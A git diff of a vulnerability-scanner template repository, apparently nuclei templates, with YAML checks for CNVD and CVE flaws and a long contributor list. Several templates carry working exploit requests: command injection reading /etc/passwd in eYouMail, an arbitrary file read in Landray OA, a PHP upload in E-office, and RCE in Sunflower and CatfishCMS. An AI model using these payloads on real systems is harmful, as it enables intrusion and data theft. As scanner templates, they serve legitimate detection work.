Remote Code Execution + author: daffainfo + severity: critical + description: eYouMail is susceptible to a remote code execution vulnerability. + reference: + - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py + - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: eyoumail,rce,cnvd,cnvd2021 + +requests: + - raw: + - | + POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type='|cat /etc/passwd||' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/vulnerabilities/other/landray-oa-fileread.yaml b/cnvd/2021/CNVD-2021-28277.yaml similarity index 66% rename from vulnerabilities/other/landray-oa-fileread.yaml rename to cnvd/2021/CNVD-2021-28277.yaml index 89b603702d..1277253402 100644 --- a/vulnerabilities/other/landray-oa-fileread.yaml +++ b/cnvd/2021/CNVD-2021-28277.yaml @@ -1,11 +1,15 @@ -id: landray-oa-fileread +id: CNVD-2021-28277 info: - name: Landray-OA Fileread - author: pikpikcu + name: Landray-OA Arbitrary - Arbitrary File Retrieval + author: pikpikcu,daffainfo severity: high - reference: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw - tags: landray,lfi + reference: + - https://www.aisoutu.com/a/1432457 + - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw + metadata: + fofa-query: app="Landray OA system" + tags: landray,lfi,cnvd,cnvd2021 requests: - raw: @@ -25,6 +29,7 @@ requests: var={"body":{"file":"file:///c://windows/win.ini"}} + stop-at-first-match: true matchers-condition: and matchers: @@ -36,4 +41,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/2021/CNVD-2021-30167.yaml similarity index 93% rename from cnvd/CNVD-2021-30167.yaml rename to cnvd/2021/CNVD-2021-30167.yaml index 41c508efc2..d3ef8cc275 100644 --- a/cnvd/CNVD-2021-30167.yaml +++ b/cnvd/2021/CNVD-2021-30167.yaml @@ -7,7 +7,7 @@ info: reference: - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://www.cnvd.org.cn/webinfo/show/6491 - tags: beanshell,rce,cnvd + tags: beanshell,rce,cnvd,cnvd2021,yonyou requests: - raw: @@ -27,7 +27,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "uid=" @@ -40,4 +39,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cnvd/2021/CNVD-2021-49104.yaml b/cnvd/2021/CNVD-2021-49104.yaml new file mode 100644 index 0000000000..125c446080 --- /dev/null +++ b/cnvd/2021/CNVD-2021-49104.yaml @@ -0,0 +1,48 @@ +id: CNVD-2021-49104 + +info: + name: Pan Micro E-office File Uploads + author: pikpikcu + severity: critical + description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker. + reference: + - https://chowdera.com/2021/12/202112200602130067.html + - http://v10.e-office.cn + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L + cvss-score: 9.9 + cwe-id: CWE-434 + remediation: Pan Wei has released an update to resolve this vulnerability. + tags: pan,micro,cnvd,cnvd2021 + +requests: + - raw: + - | + POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- + + - | + GET /images/logo/logo-eoffice.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "94d01a2324ce38a2e29a629c54190f67" + + - type: status + status: + - 200 + +# Enhanced by cs on 2022/02/28 diff --git a/cnvd/2022/CNVD-2022-03672.yaml b/cnvd/2022/CNVD-2022-03672.yaml new file mode 100644 index 0000000000..b3e9de9132 --- /dev/null +++ b/cnvd/2022/CNVD-2022-03672.yaml @@ -0,0 +1,49 @@ +id: CNVD-2022-03672 + +info: + name: Sunflower Simple and Personal - Remote Code Execution + author: daffainfo + severity: critical + description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. + reference: + - https://www.1024sou.com/article/741374.html + - https://copyfuture.com/blogs-details/202202192249158884 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: cnvd,cnvd2020,sunflower,rce + +requests: + - raw: + - | + POST /cgi-bin/rpc HTTP/1.1 + Host: {{Hostname}} + + action=verify-haras + - | + GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 + Host: {{Hostname}} + Cookie: CID={{cid}} + + extractors: + - type: regex + name: cid + internal: true + group: 1 + regex: + - '"verify_string":"(.*)"' + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1==200" + - "status_code_2==200" + - "contains(body_1, 'verify_string')" + - "contains(body_2, 'Windows IP')" + condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml deleted file mode 100644 index 9cebd8d7b0..0000000000 --- a/cnvd/CNVD-2019-06255.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CNVD-2019-06255 - -info: - name: CatfishCMS RCE - author: Lark-Lab - severity: medium - reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/ - tags: rce,cvnd,catfishcms - -requests: - - method: GET - path: - - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - condition: and - words: - - 'OS' - - 'PATH' - - 'SHELL' - - 'USER' diff --git a/cnvd/CNVD-2021-17369.yaml b/cnvd/CNVD-2021-17369.yaml deleted file mode 100644 index 8377c8296c..0000000000 --- a/cnvd/CNVD-2021-17369.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CNVD-2021-17369 - -info: - name: Ruijie Smartweb Management System Password Information Disclosure - author: pikpikcu - severity: medium - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 - tags: ruijie,disclosure,cnvd - -requests: - - method: GET - path: - - "{{BaseURL}}/web/xml/webuser-auth.xml" - headers: - Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest - - matchers-condition: and - matchers: - - - type: word - words: - - "" - - "" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/contributors.json b/contributors.json new file mode 100644 index 0000000000..57dfa18e1b --- /dev/null +++ b/contributors.json @@ -0,0 +1,1352 @@ +[ + { + "author": "Tirtha", + "links": { + "github": "https://github.com/darkc0d37", + "twitter": "https://twitter.com/tirtha_mandal", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "duty_1g", + "links": { + "github": "", + "twitter": "https://twitter.com/duty_1g", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "phyr3wall", + "links": { + "github": "", + "twitter": "https://twitter.com/phyr3wall", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "0xPrial", + "links": { + "github": "https://www.github.com/0xPrial", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "0xSmiley", + "links": { + "github": "https://www.github.com/0xSmiley", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "0xceeb", + "links": { + "github": "https://www.github.com/0xceeb", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "5tr1x", + "links": { + "github": "https://www.github.com/5tr1x", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Abss0x7tbh", + "links": { + "github": "https://www.github.com/Abss0x7tbh", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "AdamCrosser", + "links": { + "github": "https://www.github.com/AdamCrosser", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Ais8Ooz8", + "links": { + "github": "https://www.github.com/Ais8Ooz8", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Akokonunes", + "links": { + "github": "https://www.github.com/Akokonunes", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Al-AizHashim", + "links": { + "github": "https://www.github.com/Al-AizHashim", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Alex-null", + "links": { + "github": "https://www.github.com/Alex-null", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Anon-Artist", + "links": { + "github": "https://www.github.com/Anon-Artist", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "CS-Student118", + "links": { + "github": "https://www.github.com/CS-Student118", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Dheerajmadhukar", + "links": { + "github": "https://www.github.com/Dheerajmadhukar", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Ganofins", + "links": { + "github": "https://www.github.com/Ganofins", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Haones", + "links": { + "github": "https://www.github.com/Haones", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ImNightmaree", + "links": { + "github": "https://www.github.com/ImNightmaree", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "JAS-37", + "links": { + "github": "https://www.github.com/JAS-37", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "JPMartinezz", + "links": { + "github": "https://www.github.com/JPMartinezz", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "LogicalHunter", + "links": { + "github": "https://www.github.com/LogicalHunter", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "LuskaBol", + "links": { + "github": "https://www.github.com/LuskaBol", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "MMrhassel", + "links": { + "github": "https://www.github.com/MMrhassel", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Mad-robot", + "links": { + "github": "https://www.github.com/Mad-robot", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", + "links": { + "github": "https://www.github.com/Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Mubspatel", + "links": { + "github": "https://www.github.com/Mubspatel", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "NagliNagli", + "links": { + "github": "https://www.github.com/NagliNagli", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "P4rtyH4RD", + "links": { + "github": "https://www.github.com/P4rtyH4RD", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "PR3R00T", + "links": { + "github": "https://www.github.com/PR3R00T", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "RandomRobbieBF", + "links": { + "github": "https://www.github.com/RandomRobbieBF", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "SMHTahsin33", + "links": { + "github": "https://www.github.com/SMHTahsin33", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Serizao", + "links": { + "github": "https://www.github.com/Serizao", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Shivang0", + "links": { + "github": "https://www.github.com/Shivang0", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "StreetOfHackerR007", + "links": { + "github": "https://www.github.com/StreetOfHackerR007", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Sy3Omda", + "links": { + "github": "https://www.github.com/Sy3Omda", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "TheConciergeDev", + "links": { + "github": "https://www.github.com/TheConciergeDev", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Udyz", + "links": { + "github": "https://www.github.com/Udyz", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "YashGoti", + "links": { + "github": "https://www.github.com/YashGoti", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ZultanH", + "links": { + "github": "https://www.github.com/ZultanH", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "abison1", + "links": { + "github": "https://www.github.com/abison1", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "adiffpirate", + "links": { + "github": "https://www.github.com/adiffpirate", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "adriyansyah-mf", + "links": { + "github": "https://www.github.com/adriyansyah-mf", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "afaq1337", + "links": { + "github": "https://www.github.com/afaq1337", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "aiNeu0taip9ue", + "links": { + "github": "https://www.github.com/aiNeu0taip9ue", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ajaysenr", + "links": { + "github": "https://www.github.com/ajaysenr", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "alanbriangh", + "links": { + "github": "https://www.github.com/alanbriangh", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "alifathi-h1", + "links": { + "github": "https://www.github.com/alifathi-h1", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "alph4byt3", + "links": { + "github": "https://www.github.com/alph4byt3", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "and-bf", + "links": { + "github": "https://www.github.com/and-bf", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "asurti6783", + "links": { + "github": "https://www.github.com/asurti6783", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "atastycookie", + "links": { + "github": "https://www.github.com/atastycookie", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bad5ect0r", + "links": { + "github": "https://www.github.com/bad5ect0r", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bauthard", + "links": { + "github": "https://www.github.com/bauthard", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bing0o", + "links": { + "github": "https://www.github.com/bing0o", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bjhulst", + "links": { + "github": "https://www.github.com/bjhulst", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "blckraven", + "links": { + "github": "https://www.github.com/blckraven", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bnematzadeh", + "links": { + "github": "https://www.github.com/bnematzadeh", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ca3s1m", + "links": { + "github": "https://www.github.com/ca3s1m", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "daffainfo", + "links": { + "github": "https://www.github.com/daffainfo", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "darrenmartyn", + "links": { + "github": "https://www.github.com/darrenmartyn", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "deFr0ggy", + "links": { + "github": "https://www.github.com/deFr0ggy", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ehrishirajsharma", + "links": { + "github": "https://www.github.com/ehrishirajsharma", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ehsahil", + "links": { + "github": "https://www.github.com/ehsahil", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ehsandeep", + "links": { + "github": "https://www.github.com/ehsandeep", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "evanRubinsteinIT", + "links": { + "github": "https://www.github.com/evanRubinsteinIT", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "flag007", + "links": { + "github": "https://www.github.com/flag007", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "forgedhallpass", + "links": { + "github": "https://www.github.com/forgedhallpass", + "twitter": "https://twitter.com/forgedhallpass", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "gabrielbarros39", + "links": { + "github": "https://www.github.com/gabrielbarros39", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "geeknik", + "links": { + "github": "https://www.github.com/geeknik", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "gevakun", + "links": { + "github": "https://www.github.com/gevakun", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "github", + "links": { + "github": "https://www.github.com/github", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "hackerrishad", + "links": { + "github": "https://www.github.com/hackerrishad", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "harsh-bothra", + "links": { + "github": "https://www.github.com/harsh-bothra", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "harshinsecurity", + "links": { + "github": "https://www.github.com/harshinsecurity", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "hetroublemaker", + "links": { + "github": "https://www.github.com/hetroublemaker", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "iDuronto", + "links": { + "github": "https://www.github.com/iDuronto", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "impramodsargar", + "links": { + "github": "https://www.github.com/impramodsargar", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "infosecsanyam261", + "links": { + "github": "https://www.github.com/infosecsanyam261", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ioribrn", + "links": { + "github": "https://www.github.com/ioribrn", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "izn0u", + "links": { + "github": "https://www.github.com/izn0u", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "jeenikaa", + "links": { + "github": "https://www.github.com/jeenikaa", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "jeyaseelan8", + "links": { + "github": "https://www.github.com/jeyaseelan8", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "joeldeleep", + "links": { + "github": "https://www.github.com/joeldeleep", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "johnjhacking", + "links": { + "github": "https://www.github.com/johnjhacking", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "juicypotato1", + "links": { + "github": "https://www.github.com/juicypotato1", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "kevin-ntn", + "links": { + "github": "https://www.github.com/kevin-ntn", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "knightm4re", + "links": { + "github": "https://www.github.com/knightm4re", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ks6274", + "links": { + "github": "https://www.github.com/ks6274", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "lethargynavigator", + "links": { + "github": "https://www.github.com/lethargynavigator", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "mahhari", + "links": { + "github": "https://www.github.com/mahhari", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "majidmc2", + "links": { + "github": "https://www.github.com/majidmc2", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "manasjha7", + "links": { + "github": "https://www.github.com/manasjha7", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "martincodes-de", + "links": { + "github": "https://www.github.com/martincodes-de", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "melbadry9", + "links": { + "github": "https://www.github.com/melbadry9", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "meme-lord", + "links": { + "github": "https://www.github.com/meme-lord", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "mohammedshine", + "links": { + "github": "https://www.github.com/mohammedshine", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "mr-rizwan-syed", + "links": { + "github": "https://www.github.com/mr-rizwan-syed", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "nahoragg", + "links": { + "github": "https://www.github.com/nahoragg", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "nerrorsec", + "links": { + "github": "https://www.github.com/nerrorsec", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ninj4c0d3r", + "links": { + "github": "https://www.github.com/ninj4c0d3r", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "niudaii", + "links": { + "github": "https://www.github.com/niudaii", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "nxnjz", + "links": { + "github": "https://www.github.com/nxnjz", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "nytr0gen", + "links": { + "github": "https://www.github.com/nytr0gen", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "olacin", + "links": { + "github": "https://www.github.com/olacin", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "omarkurt", + "links": { + "github": "https://www.github.com/omarkurt", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "oppsec", + "links": { + "github": "https://www.github.com/oppsec", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "organiccrap", + "links": { + "github": "https://www.github.com/organiccrap", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ossie-git", + "links": { + "github": "https://www.github.com/ossie-git", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "palaziv", + "links": { + "github": "https://www.github.com/palaziv", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "pdiscoveryio", + "links": { + "github": "https://www.github.com/pdiscoveryio", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "pikpikcu", + "links": { + "github": "https://www.github.com/pikpikcu", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "pudsec", + "links": { + "github": "https://www.github.com/pudsec", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "push4d", + "links": { + "github": "https://www.github.com/push4d", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "pussycat0x", + "links": { + "github": "https://www.github.com/pussycat0x", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "r3dg33k", + "links": { + "github": "https://www.github.com/r3dg33k", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "randomstr1ng", + "links": { + "github": "https://www.github.com/randomstr1ng", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ratnadip1998", + "links": { + "github": "https://www.github.com/ratnadip1998", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ree4pwn", + "links": { + "github": "https://www.github.com/ree4pwn", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "rojan-rijal", + "links": { + "github": "https://www.github.com/rojan-rijal", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "rtcms", + "links": { + "github": "https://www.github.com/rtcms", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "secureITmania", + "links": { + "github": "https://www.github.com/secureITmania", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "shelld3v", + "links": { + "github": "https://www.github.com/shelld3v", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "sillydadddy", + "links": { + "github": "https://www.github.com/sillydadddy", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "skar4444", + "links": { + "github": "https://www.github.com/skar4444", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "swisskyrepo", + "links": { + "github": "https://www.github.com/swisskyrepo", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "team-projectdiscovery", + "links": { + "github": "https://www.github.com/team-projectdiscovery", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "thesubtlety", + "links": { + "github": "https://www.github.com/thesubtlety", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "udit-thakkur", + "links": { + "github": "https://www.github.com/udit-thakkur", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "uhnysh", + "links": { + "github": "https://www.github.com/uhnysh", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "unstabl3", + "links": { + "github": "https://www.github.com/unstabl3", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "v1dhun", + "links": { + "github": "https://www.github.com/v1dhun", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "wisnupramoedya", + "links": { + "github": "https://www.github.com/wisnupramoedya", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "xElkomy", + "links": { + "github": "https://www.github.com/xElkomy", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "zzeitlin", + "links": { + "github": "https://www.github.com/zzeitlin", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + } +] \ No newline at end of file diff --git a/cves/2000/CVE-2000-0114.yaml b/cves/2000/CVE-2000-0114.yaml index 684b6c1286..0050d0c90c 100644 --- a/cves/2000/CVE-2000-0114.yaml +++ b/cves/2000/CVE-2000-0114.yaml @@ -8,6 +8,9 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://www.exploit-db.com/exploits/19897 + classification: + cve-id: CVE-2000-0114 + remediation: Upgrade to the latest version. tags: cve,cve2000,frontpage,microsoft requests: @@ -24,4 +27,6 @@ requests: - type: word part: body words: - - "_vti_bin/shtml.dll" \ No newline at end of file + - "_vti_bin/shtml.dll" + +# Enhanced by mp on 2022/01/27 diff --git a/cves/2001/CVE-2001-1473.yaml b/cves/2001/CVE-2001-1473.yaml index 476fa47cd5..b52317707c 100644 --- a/cves/2001/CVE-2001-1473.yaml +++ b/cves/2001/CVE-2001-1473.yaml @@ -4,22 +4,26 @@ info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy severity: high - tags: network,ssh,openssh,cves,cves2001 description: SSHv1 is deprecated and has known cryptographic issues. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 classification: - cvss-score: 7.4 cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.4 cve-id: CVE-2001-1473 cwe-id: CWE-310 + remediation: Upgrade to SSH 2.4 or later. + tags: cve,cve2001,network,ssh,openssh network: - host: - "{{Hostname}}" - - "{{Hostname}}:22" + - "{{Host}}:22" + matchers: - type: word words: - "SSH-1" + +# Enhanced by Chris on 2022/01/21 diff --git a/cves/2002/CVE-2002-1131.yaml b/cves/2002/CVE-2002-1131.yaml index d289fe5b5f..4b84c6d958 100644 --- a/cves/2002/CVE-2002-1131.yaml +++ b/cves/2002/CVE-2002-1131.yaml @@ -5,7 +5,13 @@ info: author: dhiyaneshDk severity: medium description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/21811 + reference: + - https://www.exploit-db.com/exploits/21811 + - http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html + - http://www.securityfocus.com/bid/5763 + - http://www.iss.net/security_center/static/10145.php + classification: + cve-id: 